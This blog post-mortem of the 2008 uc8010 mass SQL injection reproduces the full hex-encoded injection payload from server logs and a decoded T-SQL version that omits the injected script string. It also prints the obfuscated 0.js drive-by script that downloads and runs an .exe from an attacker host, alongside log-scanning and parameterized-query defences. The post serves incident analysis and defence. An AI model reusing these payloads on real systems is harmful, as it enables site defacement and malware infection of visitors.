uc8010 sql injection attack: the facts, more info and post mortem

I posted this when my website got hacked. Within hours, thanks to several clever guys, the whole thing was completely deconstructed with hard facts and code. Thanks to all those that contributed their information, it really helped me and many others out there.

This post is a summary of the comments spawned by my original post. If I forgot something important let me know.

Also check out:

How it was done

SQL injection via unescaped querystring variables.

We think they probed several query string variables (like id, by, filter, etc.) until one was passed to the database unescaped.

Here is the code they injected (gotten from someone's logfiles, and slightly tidied)

2007-12-30 18:22:46 POST /crappyoutsourcedCMS.asp;
DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST
(0x4400450043004C0041005200450020004000540020007
600610072006300680061007200280032003500350029002
C00400043002000760061007200630068006100720028003
20035003500290020004400450043004C004100520045002
0005400610062006C0065005F0043007500720073006F007
200200043005500520053004F005200200046004F0052002
000730065006C00650063007400200061002E006E0061006
D0065002C0062002E006E0061006D0065002000660072006
F006D0020007300790073006F0062006A006500630074007
300200061002C0073007900730063006F006C0075006D006
E00730020006200200077006800650072006500200061002
E00690064003D0062002E0069006400200061006E0064002
00061002E00780074007900700065003D002700750027002
00061006E0064002000280062002E0078007400790070006
5003D003900390020006F007200200062002E00780074007
900700065003D003300350020006F007200200062002E007
80074007900700065003D0032003300310020006F0072002
00062002E00780074007900700065003D003100360037002
90020004F00500045004E0020005400610062006C0065005
F0043007500720073006F007200200046004500540043004
80020004E004500580054002000460052004F004D0020002
0005400610062006C0065005F0043007500720073006F007
200200049004E0054004F002000400054002C00400043002
0005700480049004C0045002800400040004600450054004
30048005F005300540041005400550053003D00300029002
00042004500470049004E002000650078006500630028002
70075007000640061007400650020005B0027002B0040005
4002B0027005D00200073006500740020005B0027002B004
00043002B0027005D003D0072007400720069006D0028006
3006F006E007600650072007400280076006100720063006
800610072002C005B0027002B00400043002B0027005D002
90029002B00270027003C007300630072006900700074002
0007300720063003D0068007400740070003A002F002F006
3002E007500630038003000310030002E0063006F006D002
F0030002E006A0073003E003C002F0073006300720069007
00074003E002700270027002900460045005400430048002
0004E004500580054002000460052004F004D00200020005
400610062006C0065005F0043007500720073006F0072002
00049004E0054004F002000400054002C004000430020004
5004E004400200043004C004F00530045002000540061006
2006C0065005F0043007500720073006F007200200044004
50041004C004C004F0043004100540045002000540061006
2006C0065005F0043007500720073006F007200%20AS%20
NVARCHAR(4000));
EXEC(@S);-178|80040e14|Unclosed_quotation_mark_before_the_character_string_'G;
DECLARE_@S_NVARCHAR4000);
SET_@S=CAST0x4400450043004C004100520045002000400
054002000760061007200630068006100720028003200350
0350029002C00400043002000'.
202.101.162.73 HTTP/1.0 Mozilla/3.0+(compatible;+Indy+Library) - 500 15248

Decoded (the hex is a UTF-16 encoded NVARCHAR literal, which is why every other byte is 00), the injected SQL looks like this:

DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR select a.name,b.name from
 sysobjects a,
 syscolumns b
 where
 a.id=b.id
 and a.xtype='u'
 and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
 FETCH NEXT FROM Table_Cursor INTO @T,@C
  WHILE(@@FETCH_STATUS=0)
  BEGIN
  exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''''')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
  END
  CLOSE Table_Cursor
DEALLOCATE Table_Cursor

How to find out exactly how it happened to you

Try this in the command prompt on your logfiles:
find "0x4400450043" ex071228.log
find "0x4400450043" ex071229.log
find "0x4400450043" ex071230.log
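The find commands above locate the hits; reading them still means decoding the hex by hand. The following is an added example (not code from the original post or its commenters) that does both steps in C#: it scans IIS W3C log lines for the hex-encoded NVARCHAR payload, turns the hex back into T-SQL (SQL Server NVARCHAR literals in hex form are UTF-16LE, hence the 00 after every character), checks that the decoded text has the cursor-over-sysobjects/syscolumns shape shown above, and reports the timestamp and client IP. The class and method names, the mass-update heuristic and the sample log line (built inline from the decoded SQL shown above, with a placeholder path and the documentation address 192.0.2.10) are assumptions of this example.

```csharp
// Added example, not part of the original post: decode and locate the
// uc8010-style payload in IIS log lines. Sample data below is constructed.
using System;
using System.Collections.Generic;
using System.IO;
using System.Text;
using System.Text.RegularExpressions;

public sealed class InjectionHit
{
    public string Timestamp;   // first two fields of the W3C log line (date, time)
    public string ClientIp;    // first dotted quad after the request, i.e. the c-ip field
    public string DecodedSql;  // the hex payload turned back into readable T-SQL
}

public static class Uc8010LogScanner
{
    // The marker the post greps for, 0x4400450043..., is "DEC" in UTF-16LE.
    static readonly Regex HexBlob = new Regex(@"0x((?:[0-9A-Fa-f]{2})+)", RegexOptions.IgnoreCase);
    static readonly Regex IpV4 = new Regex(@"\b(?:\d{1,3}\.){3}\d{1,3}\b");

    // A hex NVARCHAR literal is UTF-16LE: "D" is 44 00, "E" is 45 00, and so on.
    public static string DecodeNvarcharHex(string hex)
    {
        hex = hex.Substring(0, hex.Length - hex.Length % 4);   // drop a trailing partial code unit
        var bytes = new byte[hex.Length / 2];
        for (int i = 0; i < bytes.Length; i++)
            bytes[i] = Convert.ToByte(hex.Substring(i * 2, 2), 16);
        return Encoding.Unicode.GetString(bytes);
    }

    // The payload enumerates sysobjects/syscolumns with a cursor and EXECs an UPDATE
    // per text column. That shape in decoded SQL is the indicator we key on, so an
    // ordinary hex literal in some other request is not reported.
    public static bool LooksLikeMassUpdate(string sql)
    {
        var s = sql.ToUpperInvariant();
        return s.Contains("SYSOBJECTS") && s.Contains("SYSCOLUMNS")
            && s.Contains("FETCH NEXT") && s.Contains("UPDATE");
    }

    public static List<InjectionHit> Scan(IEnumerable<string> lines)
    {
        var hits = new List<InjectionHit>();
        foreach (var raw in lines)
        {
            if (raw.Length == 0 || raw[0] == '#') continue;    // W3C header lines
            var line = Uri.UnescapeDataString(raw);             // %20 etc. back to characters
            var m = HexBlob.Match(line);
            if (!m.Success) continue;
            var sql = DecodeNvarcharHex(m.Groups[1].Value);
            if (!LooksLikeMassUpdate(sql)) continue;
            var fields = raw.Split(' ');
            var ip = IpV4.Match(line, m.Index + m.Length);      // c-ip comes after the request
            hits.Add(new InjectionHit
            {
                Timestamp = fields.Length > 1 ? fields[0] + " " + fields[1] : "?",
                ClientIp = ip.Success ? ip.Value : "?",
                DecodedSql = sql
            });
        }
        return hits;
    }

    public static void Main(string[] args)
    {
        // Constructed sample line: the hex is built here from the decoded SQL shown in
        // the post, so the 0x4400450043... marker appears exactly as it does in a real log.
        string payloadSql = "DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR "
            + "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' "
            + "and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor "
            + "FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN "
            + "exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''''') "
            + "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor";
        string hex = BitConverter.ToString(Encoding.Unicode.GetBytes(payloadSql)).Replace("-", "");
        string sampleLine = "2007-12-30 18:22:46 POST /placeholder.asp id=1;DECLARE%20@S%20NVARCHAR(4000);"
            + "SET%20@S=CAST(0x" + hex + "%20AS%20NVARCHAR(4000));EXEC(@S); "
            + "192.0.2.10 HTTP/1.0 Mozilla/3.0+(compatible;+Indy+Library) - 500 15248";

        IEnumerable<string> lines = args.Length > 0 ? File.ReadLines(args[0]) : new[] { sampleLine };
        foreach (var hit in Scan(lines))
        {
            Console.WriteLine(hit.Timestamp + "  from " + hit.ClientIp);
            Console.WriteLine("  " + hit.DecodedSql);
        }
    }
}
```

Run it with the path of one ex*.log file as the only argument (or with no argument to see the constructed sample decoded); every reported line gives you the date, the source address and the readable statement, which is the evidence you want to keep before restoring from backup.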

How to fix

Make sure you escape your variables to protect against SQL injection.

In this case (MS SQL Server), you should do (something like) this:

// double any single quote so the value cannot terminate a string literal
string safer_id = (Request.QueryString["id"] ?? "").Replace("'","''");

By the looks of it, 'CAST(' and 'EXEC(' look like good things to disallow too. More than likely you should restrict the length of the querystrings too, so something like the below can't really hurt.

// double single quotes, cap the length, and break the two keywords this attack relies on
string safer = (Request.QueryString["id"] ?? "").Replace("'","''");
if (safer.Length > 128) safer = safer.Substring(0,127);
safer = safer.Replace("CAST(","NOCAST](");
safer = safer.Replace("EXEC(","NOEXEC](");

These are not foolproof(*) and you should use STORED PROCEDURES in future (I know it is much more work!).
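Worth noticing in the logged request above: the injected text contains no single quote at all (the hex literal carries the quotes), so the Replace("'","''") line never touches it; the length cap and the keyword mangling are what would have interfered. The durable version of the same advice is to never let the value reach the statement text. The following is an added example (not code from the original post) of the same lookup done with typed parameters on SQL Server, including the stored procedure route the post recommends. The table and column names, the connection string and the procedure name dbo.usp_ListArticles are assumptions of this example.

```csharp
// Added example, not part of the original post: querystring values handled as
// typed parameters instead of by string replacement. Table, column and procedure
// names are assumed for illustration.
using System;
using System.Data;
using System.Data.SqlClient;

public static class SaferLookup
{
    // A numeric id is parsed as a number. Anything that is not a positive int,
    // including ";DECLARE @S NVARCHAR(4000)...", is rejected before SQL is involved.
    public static bool TryParseId(string raw, out int id)
    {
        id = 0;
        return !string.IsNullOrEmpty(raw)
            && raw.Length <= 10
            && int.TryParse(raw, out id)
            && id > 0;
    }

    // Inline SQL with a typed parameter: the value travels separately from the
    // statement text, so whatever it contains is compared, never executed.
    public static string GetTitle(string connectionString, string rawId)
    {
        int id;
        if (!TryParseId(rawId, out id))
            throw new ArgumentException("id must be a positive integer");

        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand("SELECT title FROM articles WHERE id = @id", conn))
        {
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            conn.Open();
            return cmd.ExecuteScalar() as string;
        }
    }

    // Free text (a "filter" parameter) goes through a parameter too. The declared
    // NVarChar size is the length cap the post suggests, enforced by the driver.
    public static int CountMatches(string connectionString, string filter)
    {
        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand("SELECT COUNT(*) FROM articles WHERE title LIKE @pattern", conn))
        {
            cmd.Parameters.Add("@pattern", SqlDbType.NVarChar, 128).Value = "%" + (filter ?? "") + "%";
            conn.Open();
            return (int)cmd.ExecuteScalar();
        }
    }

    // Stored procedures are called the same way: the arguments are still typed
    // values, never pasted into an EXEC string on the web server.
    public static DataTable ListByFilter(string connectionString, string filter)
    {
        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand("dbo.usp_ListArticles", conn))   // assumed procedure name
        {
            cmd.CommandType = CommandType.StoredProcedure;
            cmd.Parameters.Add("@filter", SqlDbType.NVarChar, 128).Value = filter ?? "";
            var table = new DataTable();
            using (var adapter = new SqlDataAdapter(cmd))
                adapter.Fill(table);
            return table;
        }
    }
}
```

From the page this is simply SaferLookup.GetTitle(connectionString, Request.QueryString["id"]); a failed TryParseId is the moment to return a 400 and log the raw value, which is exactly the kind of entry the find commands above would otherwise have to dig out later.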

What did it do?

Basically the code injected into your database found every varchar and text field and appended the string:

<script src=http://?.uc8010.com/0.js></script>

The code for 0.js looks like:

// Marker cookie, expiring after 30 minutes (the commented-out line would have made it a day)
function setCookie(name,value)
{
    var Days = 1;var exp = new Date();
    exp.setTime(exp.getTime() + Days*30*60*1000);
    //Days*24*60*60*1000;
    document.cookie = name + "="+ escape(value) +";expires="+ exp.toGMTString();
}
// Returns the marker if present; otherwise writes two (empty, as shown on the page) lines and sets it
function getCookie(name)
{
    var arr = document.cookie.match(new RegExp("(^| )"+name+"=([^;]*)(;|$)"));
    if(arr != null)
    {
        return unescape(arr[2]);
    }
    else
    {
        document.writeln("");
        document.writeln("");
        setCookie("Lin","ok");
        return null;
    }
}
// What follows is the obfuscated payload: an octal-escaped string handed to eval, left encoded as on the original page
getCookie("Lin")eval("\146\165\156\143\164\151\157\156\40\147\156\50\162\122\141\107\105\171\153\125\61\51\15\12\173\15\12\166\141\162\40\117\162\150\62\75\167\151\156\144\157\167\133\42\115\141\164\150\42\135\133\42\162\141\156\144\157\155\42\135\50\51\52\162\122\141\107\105\171\153\125\61\73\15\12\162\145\164\165\162\156\47\176\164\155\160\47\53\47\56\164\155\160\47\15\12\175\15\12\146\165\156\143\164\151\157\156\40\104\157\167\156\105\50\106\151\154\145\125\122\114\54\114\157\143\141\154\106\151\154\145\51\15\12\173\15\12\164\162\171\15\12\173\15\12\166\151\160\75\106\151\154\145\125\122\114\73\15\12\166\141\162\40\143\150\145\156\172\151\75\167\151\156\144\157\167\133\42\144\157\143\165\155\145\156\164\42\135\133\42\143\162\145\141\164\145\105\154\145\155\145\156\164\42\135\50\42\157\142\152\145\143\164\42\51\73\15\12\143\150\145\156\172\151\133\42\163\145\164\101\164\164\162\151\142\165\164\145\42\135\50\42\143\154\141\163\163\151\144\42\54\42\143\154\163\151\144\72\102\104\71\66\103\65\65\66\55\66\65\101\63\55\61\61\104\60\55\71\70\63\101\55\60\60\103\60\64\106\103\62\71\105\63\66\42\51\73\15\12\166\141\162\40\160\163\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\115\151\143\162\157\163\157\146\164\56\130\115\114\110\124\124\120\42\54\42\42\51\73\15\12\166\141\162\40\154\157\166\145\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\101\144\157\144\142\56\123\164\162\145\141\155\42\54\42\42\51\73\15\12\154\157\166\145\133\42\164\171\160\145\42\135\75\61\73\15\12\160\163\133\42\157\160\145\156\42\135\50\42\107\105\124\42\54\166\151\160\54\60\51\73\15\12\160\163\133\42\163\145\156\144\42\135\50\51\73\15\12\143\150\151\156\141\75\147\156\50\61\60\60\60\60\51\53\114\157\143\141\154\106\151\154\145\73\15\12\166\141\162\40\150\110\146\44\122\66\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\123\143\162\151\160\164\151\156\147\5
6\106\151\154\145\123\171\163\164\145\155\117\142\152\145\143\164\42\54\42\42\51\73\15\12\166\141\162\40\126\147\104\156\132\130\110\164\67\75\150\110\146\44\122\66\133\42\107\145\164\123\160\145\143\151\141\154\106\157\154\144\145\162\42\135\50\60\51\73\15\12\143\150\151\156\141\75\150\110\146\44\122\66\133\42\102\165\151\154\144\120\141\164\150\42\135\50\126\147\104\156\132\130\110\164\67\54\143\150\151\156\141\51\73\15\12\154\157\166\145\133\42\117\160\145\156\42\135\50\51\73\15\12\154\157\166\145\133\42\127\162\151\164\145\42\135\50\160\163\133\42\162\145\163\160\157\156\163\145\102\157\144\171\42\135\51\73\15\12\154\157\166\145\133\42\123\141\166\145\124\157\106\151\154\145\42\135\50\143\150\151\156\141\54\62\51\73\15\12\154\157\166\145\133\42\103\154\157\163\145\42\135\50\51\73\15\12\166\141\162\40\123\155\101\143\161\111\167\107\126\70\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\123\150\145\154\154\56\101\160\160\154\151\143\141\164\151\157\156\42\54\42\42\51\73\15\12\145\170\160\61\75\150\110\146\44\122\66\133\42\102\165\151\154\144\120\141\164\150\42\135\50\126\147\104\156\132\130\110\164\67\53\47\134\134\163\171\163\164\145\155\63\62\47\54\47\143\155\144\56\145\170\145\47\51\73\15\12\123\155\101\143\161\111\167\107\126\70\133\42\123\150\145\154\154\105\170\145\143\165\164\145\42\135\50\145\170\160\61\54\47\40\57\143\40\47\53\143\150\151\156\141\54\42\42\54\42\157\160\145\156\42\54\60\51\175\143\141\164\143\150\50\151\51\173\151\75\61\175\15\12\175\15\12\104\157\167\156\105\50\42\150\164\164\160\72\57\57\143\56\165\143\70\60\61\60\56\143\157\155\57\162\156\155\142\57\60\57\61\56\145\170\145\42\54\42\61\71\56\145\170\145\42\51\73")

It is malicious: the point

According to websmithrob this code is malicious and hidden in there is an attack known as the EXPL_REALPLAY.H or RealPlayer Exploit (read more about it here)

Microsoft issues security advisory


uc8010 is an SQL injection attack

02 January 2008
original post: a plea for help

I cannot find any information about this anywhere, but it happened to me and at least 76,800 others. Information is thin on the ground. If you know more please post it here.

As far as I can tell, the attack inserts <script src=http://?.uc8010.com/0.js></script> into all varchar and text fields in your SQL database.

For lazy people like me, it is proving to be a nightmare! I have traditionally been very relaxed about this kind of business, I guess I must be more careful from now on.

07 January 2008
update on uc8010(dot)com

The exploit has been exposed and described (see the comments below; very, very informative, or go straight to the post-mortem). Below you can find out HOW they did it and WHAT it did. There is no magic fix: you will most likely have to restore your data from a backup, and to prevent further attacks you should escape all querystring variables coming into your database.
Thanks very much to the guys who posted their findings here! Much appreciated.

The attack *is* malicious, and the potential payload is described here http://websmithrob.wordpress.com/ (or this http://isc.sans.org/diary.html?date=2008-01-04).

Also watch out for ucmal.com (122.224.146.246) which appears to be up to similar tricks.